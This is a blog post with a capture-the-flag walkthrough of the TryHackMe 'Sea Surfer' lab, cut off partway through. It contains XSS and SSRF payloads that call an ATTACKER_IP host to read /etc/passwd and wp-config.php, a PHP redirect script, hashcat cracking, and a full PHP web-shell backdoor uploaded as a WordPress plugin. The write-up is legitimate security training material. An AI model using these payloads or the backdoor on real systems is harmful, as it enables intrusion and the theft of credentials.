<!DOCTYPE html><html lang="en-US" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="pv-cache-enabled" content="false"><meta name="generator" content="Jekyll v4.3.2" /><meta property="og:title" content="Sea Surfer" /><meta property="og:locale" content="en_US" /><meta name="description" content="Sea Surfer" /><meta property="og:description" content="Sea Surfer" /><link rel="canonical" href="https://nananan.github.io/posts/seasurfer/" /><meta property="og:url" content="https://nananan.github.io/posts/seasurfer/" /><meta property="og:site_name" content="CinnamonSec" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-06-22T00:00:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Sea Surfer" /><meta name="twitter:site" content="@_cinnamon_92" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2023-08-06T17:51:49+02:00","datePublished":"2022-06-22T00:00:00+02:00","description":"Sea Surfer","headline":"Sea Surfer","mainEntityOfPage":{"@type":"WebPage","@id":"https://nananan.github.io/posts/seasurfer/"},"url":"https://nananan.github.io/posts/seasurfer/"}</script><title>Sea Surfer | CinnamonSec</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-4NBRMHJVCG"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-4NBRMHJVCG'); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/img/favicon.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">CinnamonSec</a></div><div class="site-subtitle font-italic">Cyber Security interested.<br> Rubber Ducks lover.</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/rust-art/" class="nav-link"> <i class="fa-fw fas fa-paint-brush ml-xl-3 mr-xl-3 unloaded"></i> <span>RUST ART</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/nananan" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/_cinnamon_92" aria-label="twitter" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['eliana-c','live.it'].join('@')" aria-label="email" class="order-5" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" class="order-6" > <i class="fas fa-rss"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Sea Surfer</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Sea Surfer</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> Eliana Cannella </span> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Wed, Jun 22, 2022, 12:00 AM +0200" prep="on" > Jun 22, 2022 <i class="unloaded">2022-06-22T00:00:00+02:00</i> </span></div><div> <span> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sun, Aug 6, 2023, 5:51 PM +0200" prefix="Updated " > Aug 6, 2023 <i class="unloaded">2023-08-06T17:51:49+02:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1756 words">9 min</span></div></div><div class="post-content"><h1 id="sea-surfer">Sea Surfer</h1><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/seasurfer.png" width="50%" height="50%" /></p><p>You can find this CTF <a href="https://tryhackme.com/room/seasurfer">here</a></p><h2 id="enumeration"><span style="color: var(--link-color);">Enumeration</span></h2><p>As always, I began with a nmap scan (what is more important than enumeration? beer? 🧐):</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre><td class="rouge-code"><pre><span class="nb">sudo </span>nmap <span class="nt">-sV</span> <span class="nt">-sS</span> <span class="nt">-sC</span> <span class="nt">-O</span> <span class="nt">-v</span> <span class="nt">-p-</span> 10.10.181.107
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> password <span class="k">for </span>kali: 
Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2022-06-20 06:58 EDT
<span class="o">[</span>TRUNCATED]
Nmap scan report <span class="k">for </span>10.10.181.107
Host is up <span class="o">(</span>0.046s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65533 closed tcp ports <span class="o">(</span>reset<span class="o">)</span>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 87:e3:d4:32:cd:51:d2:96:70:ef:5f:48:22:50:ab:67 <span class="o">(</span>RSA<span class="o">)</span>
|   256 27:d1:37:b0:c5:3c:b5:81:6a:7c:36:8a:2b:63:9a:b9 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 7f:13:1b:cf:e6:45:51:b9:09:43:9a:23:2f:50:3c:94 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>

<span class="o">[</span>TRUNCATED]
</pre></table></code></div></div><p>Let’s check the port 80:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/website_ip.png" alt="Website" /></p><p>It’s an apache website with the default page. I tried to enumerate the page with gobuster but I didn’t find anything useful. So, out of despair, I use <strong>Nikto</strong>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/nikto.png" alt="Nikto Output" /></p><p>And I noticed that there was the following output:</p><div class="language-shell highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>+ Uncommon header <span class="s1">'x-backend-server'</span> found, with contents: seasurfer.thm
</pre></table></code></div></div><p>Yeah, I also could see the header without nikto but I were good to notice that in nikto output 🙂</p><p>So, I added the hostname in <strong>/etc/hosts</strong> file:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/etc_hosts.png" alt="/etc/hosts" /></p><p>Then, I navigated to the hostname and I found the real website:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/sea_surfer_site.png" alt="Sea Surfer website" /></p><p>By watching the website, I found a possible username, “kyle”:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/username_kyle.png" alt="Kyle Username" /></p><p>This could be a username, indeed, trying to insert in the login page <strong>wp-login.php</strong> (this page is a standard login page of WordPress websites), I received the following error:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/wrong_username.png" alt="Wrong Username" /></p><p>Instead, if I used a non-existent user, I received this:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/notexist_user.png" alt="Notexistent Username" /></p><p>So, I could confirm that kyle is the username of the website.</p><p>Continuing to analyze the website, I found also an article in which there was useful information. Indeed, by watching the <strong>News</strong> articles, there was a user comment that ask (I think to kyle) something about an internal site that didn’t work:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/blog_discover_internal.png" alt="Discover Internal Website" /></p><p>Indeed, in the guy’s comment, there was “intrenal.seasurfer.thm” but I thought that the right hostname was <strong>internal</strong>.seasurfer.thm. I added also this hostname to /etc/hosts page:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/etc_hosts_internal.png" alt="/etc/hosts" /></p><blockquote><p>Tips: There is no need to add two rows in /etc/hosts for the same IP, you can add more hostnames for a single IP</p></blockquote><p>I, then, navigated to that website and I retrieved this:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/internal_seasurfer.png" alt="Internal Website" /></p><p>What a peaceful desktop image!</p><h2 id="foothold"><span style="color: var(--link-color);">Foothold</span></h2><p>I began to insert some normal input into the website to see what happened: <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/test_pdf_dati.png" alt="Normal Input" /></p><p>And I obtained a pdf file with the input that I inserted:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/test_pdf.png" alt="Normal Input" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/meme/sticker_pdf.png" alt="Meme Linpeas" /></p><p>So, I started to put some payload to check if I could use it. I began with some stupid payload like <code class="language-plaintext highlighter-rouge">&lt;script&gt;alert(1)&lt;/script&gt;</code>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/test_payload.png" alt="Script Input" /></p><p>I know that I didn’t obtain an alert, since it was a pdf but I would to see what happens. Maybe there was some check to the word? Maybe the string was inserted as I wrote? I don’t know, let’s check. The result was the following:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/test_payload_pdf.png" alt="Script Input" /></p><p>Wow! So maybe I can use this to execute a command. I began to search online for something about “execution command pdf” and I found this <a href="https://medium.com/r3d-buck3t/xss-to-exfiltrate-data-from-pdfs-f5bbb35eaba7">article</a>.</p><p>By using the payload of the previous link I confirmed the vulnerability, by using the following payload:</p><div class="language-html highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"x"</span> <span class="na">onerror=</span><span class="s">"document.write('test')"</span> <span class="nt">/&gt;</span>
</pre></table></code></div></div><p>I obtained the “test” text on the pdf file: <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/test_document_write_pdf.png" alt="Test payload" /></p><p>It works! I tried to get some payload in the link and I tried this:</p><div class="language-html highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nt">&lt;iframe</span> <span class="na">src=</span><span class="s">"file:///etc/passwd"</span><span class="nt">&gt;</span> 
</pre></table></code></div></div><p>But I obtained an empty iframe 😔</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/meme/execute_payload.png" alt="C'mon execute payload" /></p><p>Since in the link was an important note that said that if the schema of the webpage is different from <strong>ftp://</strong> the payload <code class="language-plaintext highlighter-rouge">file:///etc/passwd</code> didn’t work. So, I checked the schema with this payload:</p><div class="language-html highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nt">&lt;script&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">)</span><span class="nt">&lt;/script&gt;</span>
</pre></table></code></div></div><p>And, bad news guys, I discovered that was <strong>http://</strong>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/schema_pdf.png" alt="Schema payload" /></p><p>I also used the following payload to retrieve the software/version used:</p><div class="language-html highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">document.write(navigator.appVersion)</span><span class="nt">&gt;</span>
</pre></table></code></div></div><p>And I obtained this: <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/name_software.png" alt="Software payload" /></p><p>So I discovered that it used <strong>wkhtmltopdf</strong> to generate the pdf but I didn’t have the version. Searching this software I found many resources that talk about SSRF.</p><p>I found some interesting <a href="https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/">link</a> in which they use a PHP script to redirect the request and obtain the requested file. So, I used the following code:</p><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre><span class="cp">&lt;?php</span>

<span class="nv">$loc</span> <span class="o">=</span> <span class="s2">"http://127.0.0.1/"</span><span class="p">;</span>

<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'a'</span><span class="p">])){</span>
    <span class="nv">$loc</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'a'</span><span class="p">];</span>
<span class="p">}</span>
<span class="nb">header</span><span class="p">(</span><span class="s1">'Location: '</span><span class="mf">.</span><span class="nv">$loc</span><span class="p">);</span>

<span class="cp">?&gt;</span>
</pre></table></code></div></div><p>I started a PHP server (the error that I done before was that I used a python server and the PHP script didn’t execute the payload):</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>php <span class="nt">-S</span> 0.0.0.0:80
</pre></table></code></div></div><p>And, then, I used the following payload to call the PHP script:</p><div class="language-html highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nt">&lt;iframe</span> <span class="na">height=</span><span class="s">2000</span> <span class="na">width=</span><span class="s">50</span> <span class="na">src=</span><span class="s">"http://ATTACKER_IP/ssrf.php?a=file:///etc/passwd"</span><span class="nt">&gt;</span>
</pre></table></code></div></div><p>And I obtained the <strong>/etc/passwd</strong> file: <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/passwd.png" alt="Passwd" /></p><p>So, I tried with different files but a common file on the WordPress website is <strong>wp-config</strong>, but I didn’t know the entire path in the server. So I tried many path such as <strong>/var/www/seasurfer</strong>, then I tried the common path <strong>/var/www/wordpress</strong> and it worked:</p><div class="language-html highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nt">&lt;iframe</span> <span class="na">height=</span><span class="s">2000</span> <span class="na">width=</span><span class="s">1000</span> <span class="na">src=</span><span class="s">"http://ATTACKER_IP/ssrf.php?a=file:///var/www/wordpress/wp-config.php"</span><span class="nt">&gt;</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/wp-config.png" alt="Wp-config" /></p><p>In the file there was the following (I’m sorry, censored) information:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'CENSORED' );
/** Database username */
define( 'DB_USER', 'CENSORED' );
/** Database password */
define( 'DB_PASSWORD', 'CENSORED' );
</pre></table></code></div></div><p>I had some credentials but I didn’t know where to use them. I thought that I miss something, so, I started again an enumeration with gobuster but this time with a bigger wordlist and I found an interesting path: <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/gobuster_big.png" alt="Big Gobuster" /></p><p>I navigated to that link and I found a login page for a database (Yeah! I can use here the found credentials):</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/adminer_db.png" alt="Adminer" /></p><p>I go to the <strong>db_user</strong> table to see if there is some useful credentials and I got a hashed password from kyle:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/db_user.png" alt="Kyle Credentials DB" /></p><p>I check what type of hash is:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/hashid.png" alt="Hashid" /></p><p>And I cracked that hashed password by using hashcat:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>hashcat <span class="nt">-m</span> 400 <span class="s1">'HASH'</span> ~/Documents/rockyou.txt

<span class="o">(</span>HASH<span class="o">)</span>:<span class="o">(</span>PASSWORD DECRYPTED<span class="o">)</span>
</pre></table></code></div></div><h2 id="www-data-access"><span style="color: var(--link-color);">www-data Access</span></h2><p>By using that password I could login into the website with kyle user: <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/login_wordpress.png" alt="Login Wordpress" /></p><p>There are several ways to abuse WordPress. I tried to upload a web shell by using the Plugin page:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/plugin.png" alt="Plugin" /></p><p>So, I clicked on “Add new”:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/upload_plugin.png" alt="Upload Plugin" /></p><p>And I clicked on “Upload Plugin”:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/browse_plugin.png" alt="Browse Plugin" /></p><p>And I uploaded the following PHP code:</p><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre><span class="c">&lt;!-- Simple PHP backdoor by DK (http://michaeldaw.org) --&gt;</span>

<span class="cp">&lt;?php</span>

<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">])){</span>
        <span class="k">echo</span> <span class="s2">"&lt;pre&gt;"</span><span class="p">;</span>
        <span class="nv">$cmd</span> <span class="o">=</span> <span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">]);</span>
        <span class="nb">system</span><span class="p">(</span><span class="nv">$cmd</span><span class="p">);</span>
        <span class="k">echo</span> <span class="s2">"&lt;/pre&gt;"</span><span class="p">;</span>
        <span class="k">die</span><span class="p">;</span>
<span class="p">}</span>

<span class="cp">?&gt;</span>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<span class="c">&lt;!--    http://michaeldaw.org   2006    --&gt;</span>
</pre></table></code></div></div><p>This upload gave me an error:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/error_upload_plugin.png" alt="Error Plugin" /></p><p>But the file was uploaded anyway, indeed, by navigating the “Media” page, I saw my <strong>shell.php</strong>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/media_wordpress.png" alt="Media" /></p><p>But, it was needed the path of that file to use it and I retrieved that by looking at the media information (by clicking on the icon of shell.php):</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/seasurfer/path_media_shell.png" alt="Shell.php information" /></p><p>I tested that the script worked by navigating the URL in the info page:</p><p><img 